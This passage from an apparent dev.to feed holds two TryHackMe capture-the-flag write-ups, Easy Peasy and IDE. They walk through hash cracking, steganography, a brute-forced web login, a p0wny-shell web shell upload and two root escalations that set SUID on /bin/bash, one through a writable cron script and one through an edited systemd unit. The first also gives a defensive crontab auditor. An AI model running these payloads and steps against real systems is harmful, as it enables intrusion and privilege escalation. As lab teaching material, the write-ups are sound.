&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99ezflpd08h4ta46uuqs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99ezflpd08h4ta46uuqs.png" alt="hash" width="692" height="240"&gt;&lt;/a&gt;&lt;br&gt;
Running john with the provided wordlist fails, most likely because the wrong format is used. To fix this, john is run against every format that &lt;code&gt;hashid&lt;/code&gt; suggested.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;for &lt;/span&gt;f &lt;span class="k"&gt;in &lt;/span&gt;Snefru-256 Raw-SHA256 RIPEMD-256 HAVAL-256-3 gost gost-crypto Raw-SHA3-256 skein-256 skein-512-256&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do &lt;/span&gt;john hash.txt &lt;span class="nt"&gt;--wordlist&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;~/Desktop/easypeasy.txt &lt;span class="nt"&gt;--format&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;$f&lt;/span&gt; &lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;John cracks the hash. The format is GOST, a Russian alternative to SHA256.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd8j1fvli5kgzsemfk4s8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fd8j1fvli5kgzsemfk4s8.png" alt="cracked" width="800" height="167"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The cracked password matches the filename of the image on the page, suggesting steganography. It is used as a passphrase to extract &lt;code&gt;secrettext.txt&lt;/code&gt; from the image.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;steghide extract &lt;span class="nt"&gt;-sf&lt;/span&gt; binarycodepixabay.jpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe24vgbnkij4ciyfkf212.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe24vgbnkij4ciyfkf212.png" alt="extracted" width="382" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The file contains the username &lt;code&gt;boring&lt;/code&gt; in plain text and a password in binary.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The binary decodes to &lt;code&gt;iconvertedmypasswordtobinary&lt;/code&gt;. Logging in via SSH as &lt;code&gt;boring&lt;/code&gt; and reading &lt;code&gt;/home/boring/user.txt&lt;/code&gt; reveals the user flag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a0jvgf33zfa0ez4y}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The flag looks like a Caesar or Vigenère cipher. &lt;a href="https://www.boxentriq.com/analysis/cipher-identifier" rel="noopener noreferrer"&gt;Cipher Identifier&lt;/a&gt; identifies it as Caesar. Trying each shift manually, shift 13 decodes it to &lt;code&gt;flag{REDACTED}&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;ROT13 is simply the Caesar cipher with a shift of 13.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
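&lt;p&gt;The decoding steps of this room (the hidden paragraphs, the "only Base62 produces readable output" observation, the binary password and the rotated flag) worked through as one added Python example; it is not part of the original write-up. It assumes CyberChef's default Base62 alphabet (0-9, A-Z, a-z) and uses the CTF flag format &lt;code&gt;flag{&lt;/code&gt; as the marker for the Caesar brute force; the decoded flags are not written into the code.&lt;/p&gt;

```python
import base64
import binascii

# Constructed inputs copied from the page. The decoded flags are deliberately not
# written down here; the checks only look at the flag{ prefix.
BASE64_PARAGRAPH = "ZmxhZ3tmMXJzN19mbDRnfQ=="
HINTED_STRING = "ObsJmP173N2X6dOrAgEAL0Vu"      # "its encoded with ba...."
BINARY_PASSWORD = (
    "01101001 01100011 01101111 01101110 01110110 01100101 01110010 "
    "01110100 01100101 01100100 01101101 01111001 01110000 01100001 "
    "01110011 01110011 01110111 01101111 01110010 01100100 01110100 "
    "01101111 01100010 01101001 01101110 01100001 01110010 01111001"
)
ROTATED_FLAG = "synt{a0jvgf33zfa0ez4y}"

# Assumption: the digit alphabet CyberChef uses by default for Base62 (0-9, A-Z, a-z).
BASE62_ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def base62_decode(text):
    """Read the string as one big base-62 integer and return its big-endian bytes.

    Leading zero bytes cannot be represented this way, which is fine for text.
    """
    n = 0
    for ch in text:
        n = n * 62 + BASE62_ALPHABET.index(ch)   # ValueError on a foreign character
    return n.to_bytes(max(1, (n.bit_length() + 7) // 8), "big")


def readable(data):
    """Return the text if the bytes are printable ASCII, otherwise None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


DECODERS = {
    "base32": base64.b32decode,
    "base64": base64.b64decode,
    "base62": base62_decode,
}


def try_bases(text):
    """Run every Base decoder and keep only those whose output reads as text.

    This is the 'only Base62 produces readable output' step from the write-up.
    """
    results = {}
    for name, decode in DECODERS.items():
        try:
            data = decode(text)
        except (binascii.Error, ValueError):
            continue                      # not valid input for this encoding
        text_out = readable(data)
        if text_out is not None:
            results[name] = text_out
    return results


def binary_to_text(bits):
    """Decode space-separated 8-bit groups into ASCII."""
    return "".join(chr(int(group, 2)) for group in bits.split())


def caesar_shift(text, shift):
    """Shift ASCII letters by 'shift' places; digits, braces and punctuation stay."""
    out = []
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def find_shift(text, marker="flag{"):
    """Try all 26 shifts; return (shift, plaintext) for the first one that exposes the marker."""
    for shift in range(26):
        candidate = caesar_shift(text, shift)
        if marker in candidate:
            return shift, candidate
    return None


if __name__ == "__main__":
    print(try_bases(BASE64_PARAGRAPH))
    print(try_bases(HINTED_STRING))
    print(binary_to_text(BINARY_PASSWORD))
    print(find_shift(ROTATED_FLAG))
```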

&lt;p&gt;The room description mentions vulnerable cronjobs, so &lt;code&gt;/etc/crontab&lt;/code&gt; is checked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;    &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt; &lt;span class="k"&gt;*&lt;/span&gt;   root    &lt;span class="nb"&gt;cd&lt;/span&gt; /var/www/ &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nb"&gt;sudo &lt;/span&gt;bash .mysecretcronjob.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Root runs &lt;code&gt;.mysecretcronjob.sh&lt;/code&gt; every minute. The file is owned by &lt;code&gt;boring&lt;/code&gt; and writable, so anything appended to it runs as root; that is used to set the SUID bit on &lt;code&gt;/bin/bash&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo5gbvs23j93ompq9ck9s.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fo5gbvs23j93ompq9ck9s.png" alt="cron file" width="627" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The following payload is appended to the script.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;'chmod +s /bin/bash'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt; /var/www/.mysecretcronjob.sh
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;After the cronjob fires, running&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-p&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;gives a root shell.&lt;/p&gt;
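&lt;p&gt;The root cause here is a root-run cron script that a non-root user can edit. As an added example (not part of the original write-up), the following Python check parses a system crontab, resolves the script each root job executes (honouring a leading &lt;code&gt;cd&lt;/code&gt;), and reports files that are not owned by root or carry group/world write bits. The crontab text and the staged directory tree are constructed for the demo; the &lt;code&gt;fs_root&lt;/code&gt; parameter is my own addition so the check can run against a staging tree instead of the live filesystem.&lt;/p&gt;

```python
import os
import pwd
import shlex
import stat
import tempfile

# Constructed sample mirroring the /etc/crontab entry shown above, plus a stock
# run-parts line. The two ampersands are built with chr(38) only so that this
# listing stays valid inside the feed's markup.
AND = chr(38) * 2
SAMPLE_CRONTAB = (
    "SHELL=/bin/sh\n"
    "# m h dom mon dow user  command\n"
    "* *    * * *   root    cd /var/www/ " + AND + " sudo bash .mysecretcronjob.sh\n"
    "17 *   * * *   root    cd / " + AND + " run-parts --report /etc/cron.hourly\n"
)
# Tokens that are never a script path.
SKIP_TOKENS = {AND, ";", "|", "||", "cd", "sudo", "bash", "sh", "run-parts"}


def parse_system_crontab(text):
    """Return (user, command) for each job line of a system crontab (/etc/crontab format)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                       # blank line, comment, or VAR=value
        fields = line.split(None, 6)       # five schedule fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def referenced_files(command, fs_root="/"):
    """Resolve path-like tokens of a command to existing files, honouring 'cd DIR'.

    fs_root lets the check run against a staged directory tree instead of '/'.
    """
    cwd = "/"
    found = []
    prev = None
    for tok in shlex.split(command):
        if prev == "cd":
            cwd = tok                      # later relative paths resolve from here
        elif not (tok.startswith("-") or tok in SKIP_TOKENS):
            rel = os.path.join(cwd, tok).lstrip("/")
            candidate = os.path.join(fs_root, rel)
            if os.path.isfile(candidate):
                found.append(candidate)
        prev = tok
    return found


def weak_permissions(path, privileged_user="root"):
    """List the reasons a script run by root could be modified by someone else."""
    st = os.stat(path)
    perm = format(stat.S_IMODE(st.st_mode), "03o")   # e.g. '744'
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name
    except KeyError:
        owner = str(st.st_uid)
    reasons = []
    if owner != privileged_user:
        reasons.append("owned by " + owner)
    if int(perm[1]) in (2, 3, 6, 7):       # group write bit set
        reasons.append("group-writable")
    if int(perm[2]) in (2, 3, 6, 7):       # other write bit set
        reasons.append("world-writable")
    return reasons


def audit_crontab(text, fs_root="/"):
    """Return (user, script, reasons) for root jobs whose scripts are not root-only writable."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for script in referenced_files(command, fs_root):
            reasons = weak_permissions(script)
            if reasons:
                findings.append((user, script, reasons))
    return findings


def demo_tree(mode):
    """Stage a throwaway tree containing var/www/.mysecretcronjob.sh with the given mode."""
    root = tempfile.mkdtemp(prefix="cron-audit-")
    www = os.path.join(root, "var", "www")
    os.makedirs(www)
    script = os.path.join(www, ".mysecretcronjob.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n")
    os.chmod(script, mode)
    return root, script


if __name__ == "__main__":
    root, _ = demo_tree(0o777)
    for user, script, reasons in audit_crontab(SAMPLE_CRONTAB, fs_root=root):
        print(user + " job runs " + script + ": " + ", ".join(reasons))
```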

&lt;h3&gt;
  
  
  Question 1
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Using GoBuster, find flag 1.&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 2
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Further enumerate the machine, what is flag 2?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 3
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Crack the hash with easypeasy.txt, What is the flag 3?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 4
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the hidden directory?&lt;/code&gt; Answer: &lt;code&gt;/n0th1ng3ls3m4tt3r&lt;/code&gt; (PEAK Reference to &lt;a href="https://www.youtube.com/watch?v=tAGnKpE4NCI" rel="noopener noreferrer"&gt;Metallica&lt;/a&gt;)&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 5
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;Using the wordlist that provided to you in this task crack the hash what is the password?&lt;/code&gt; Answer: &lt;code&gt;mypasswordforthatjob&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 6
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the password to login to the machine via SSH?&lt;/code&gt; Answer: &lt;code&gt;iconvertedmypasswordtobinary&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 7
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the user flag?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Question 8
&lt;/h3&gt;

&lt;p&gt;&lt;code&gt;What is the root flag?&lt;/code&gt; Answer: &lt;code&gt;flag{REDACTED}&lt;/code&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>tutorial</category>
      <category>linux</category>
      <category>ctf</category>
    </item>
    <item>
      <title>IDE - THM</title>
      <dc:creator>Laach_</dc:creator>
      <pubDate>Fri, 12 Jun 2026 19:46:13 +0000</pubDate>
      <link>https://dev.to/laach_/ide-thm-1604</link>
      <guid>https://dev.to/laach_/ide-thm-1604</guid>
      <description>&lt;h2&gt;
  
  
  Machine Info
&lt;/h2&gt;

&lt;p&gt;Difficulty: Easy🟩&lt;br&gt;
Link: &lt;a href="https://tryhackme.com/room/ide" rel="noopener noreferrer"&gt;HERE&lt;/a&gt;&lt;br&gt;
Avg time: 45 Minutes&lt;br&gt;
OS: Linux&lt;/p&gt;

&lt;p&gt;Description: &lt;code&gt;An easy box to polish your enumeration skills!&lt;/code&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  Recon
&lt;/h2&gt;

&lt;p&gt;Starting with a standard &lt;code&gt;nmap&lt;/code&gt; scan:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo &lt;/span&gt;nmap 10.113.154.9 &lt;span class="nt"&gt;-Pn&lt;/span&gt; &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="nt"&gt;-oN&lt;/span&gt; scan.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27fp18fch3rl3izuvz5j.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F27fp18fch3rl3izuvz5j.png" alt="nmap" width="800" height="750"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Scan reveals:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;21/tcp - FTP&lt;/li&gt;
&lt;li&gt;22/tcp - SSH&lt;/li&gt;
&lt;li&gt;80/tcp - HTTP&lt;/li&gt;
&lt;li&gt;62337/tcp - HTTP&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Shell as www-data
&lt;/h2&gt;

&lt;p&gt;Nmap revealed that FTP allows anonymous login. At first look it seems empty.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5j5aw400kxx9jbi81r1l.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5j5aw400kxx9jbi81r1l.png" alt="ftp" width="557" height="116"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In Linux, &lt;code&gt;.&lt;/code&gt; means the current directory and &lt;code&gt;..&lt;/code&gt; means the parent directory, but &lt;code&gt;...&lt;/code&gt; has no special meaning; here it is just an ordinary directory name. Inside it there is a file named &lt;code&gt;-&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vwy6ed2e8oiwdh34f43.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9vwy6ed2e8oiwdh34f43.png" alt="ftp file" width="540" height="197"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After downloading the file, it was renamed to avoid issues with tools such as &lt;code&gt;cat&lt;/code&gt;, which treat a leading &lt;code&gt;-&lt;/code&gt; as an option. Renamed using:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mv&lt;/span&gt; &lt;span class="s1"&gt;'-'&lt;/span&gt; ftp.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows &lt;code&gt;cat&lt;/code&gt; to read the file properly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxb96ka58k06wuuuy79rr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxb96ka58k06wuuuy79rr.png" alt="file" width="780" height="100"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This tells &lt;code&gt;John&lt;/code&gt; that his password was set to the default. The website on port 80 showed nothing, even after running Feroxbuster against it. Next was HTTP on port 62337, which presented a login page. Knowing that there is a user &lt;code&gt;John&lt;/code&gt; with a default password, Turbo Intruder was run in Burp with &lt;code&gt;rockyou.txt&lt;/code&gt; against the login endpoint. Only one response stood out, with an enormous Anomaly rank.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrzfhhk12nfoliujgaey.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffrzfhhk12nfoliujgaey.png" alt="intruder" width="798" height="77"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After logging in, there was Codiad. It's a lightweight web IDE. Each new project is stored in &lt;code&gt;workspace/[NAME]&lt;/code&gt;.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;After logging in there was one project called 'CloudCall'. It was stored in a different folder. Only new projects are stored in &lt;code&gt;workspace/[NAME]&lt;/code&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;After creating a new project, &lt;a href="https://github.com/flozz/p0wny-shell.git" rel="noopener noreferrer"&gt;p0wny-shell&lt;/a&gt; was uploaded. It was accessible at &lt;code&gt;workspace/[NAME]/p0wny-shell.php&lt;/code&gt;. To get a stable shell, &lt;a href="https://github.com/brightio/penelope" rel="noopener noreferrer"&gt;penelope&lt;/a&gt; was used. It's an awesome Linux shell handler.&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as drac
&lt;/h2&gt;

&lt;p&gt;After gaining access as www-data, linpeas was transferred and run. It revealed a MySQL password in the &lt;code&gt;drac&lt;/code&gt; user's bash history.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9memdugfgvj92v1nnnmj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9memdugfgvj92v1nnnmj.png" alt="history" width="326" height="51"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Linpeas output showed that MySQL was not listening on any port, so the password was tried for the &lt;code&gt;drac&lt;/code&gt; user account instead, and it worked.&lt;/p&gt;

&lt;p&gt;Flag located at: &lt;code&gt;/home/drac/user.txt&lt;/code&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Shell as root
&lt;/h2&gt;

&lt;p&gt;Knowing the password, the following was run:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; &lt;span class="nt"&gt;-l&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It revealed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvyyrthuqzv9onpxwmqhn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvyyrthuqzv9onpxwmqhn.png" alt="sudo" width="800" height="125"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This allows nothing except restarting &lt;code&gt;vsftpd&lt;/code&gt;. Linpeas was run again. It showed write permission on &lt;code&gt;/lib/systemd/system/vsftpd.service&lt;/code&gt;. This unit file defines what gets executed on actions such as start, reload, and more. It looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="nn"&gt;[Unit]&lt;/span&gt;
&lt;span class="py"&gt;Description&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;vsftpd&lt;/span&gt; &lt;span class="err"&gt;FTP&lt;/span&gt; &lt;span class="err"&gt;daemon&lt;/span&gt;
&lt;span class="py"&gt;After&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;network.target&lt;/span&gt;

&lt;span class="nn"&gt;[Service]&lt;/span&gt;
&lt;span class="py"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;simple&lt;/span&gt;
&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;/usr/sbin/vsftpd&lt;/span&gt; &lt;span class="err"&gt;/etc/vsftpd.conf&lt;/span&gt;
&lt;span class="py"&gt;ExecReload&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;/bin/kill&lt;/span&gt; &lt;span class="err"&gt;-HUP&lt;/span&gt; &lt;span class="err"&gt;$MAINPID&lt;/span&gt;
&lt;span class="py"&gt;Restart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;on-failure&lt;/span&gt;
&lt;span class="py"&gt;RestartSec&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="err"&gt;s&lt;/span&gt;

&lt;span class="nn"&gt;[Install]&lt;/span&gt;
&lt;span class="py"&gt;WantedBy&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;multi-user.target&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;When restarting, the service gets turned off and on. The service manager executes the value of &lt;code&gt;ExecStart&lt;/code&gt;. Changing it to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight toml"&gt;&lt;code&gt;&lt;span class="py"&gt;ExecStart&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="err"&gt;chmod&lt;/span&gt; &lt;span class="err"&gt;+s&lt;/span&gt; &lt;span class="err"&gt;/bin/bash&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;will trigger this command on restart. However, trying to restart vsftpd immediately results in this error:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Warning: The unit file, source configuration file or drop-ins of vsftpd.service changed on disk. Run 'systemctl daemon-reload' to reload units.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means systemd has not picked up the modified unit file yet; it still uses the copy loaded in memory, with the old &lt;code&gt;ExecStart&lt;/code&gt; value. Reloading is required:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;systemctl daemon-reload
&lt;span class="nb"&gt;sudo&lt;/span&gt; /usr/sbin/service vsftpd restart
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This reloads systemd and restarts vsftpd, executing the command.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;INFO: &lt;em&gt;Don't paste both at once because the first one gives a password prompt. Pasting both may interrupt it.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

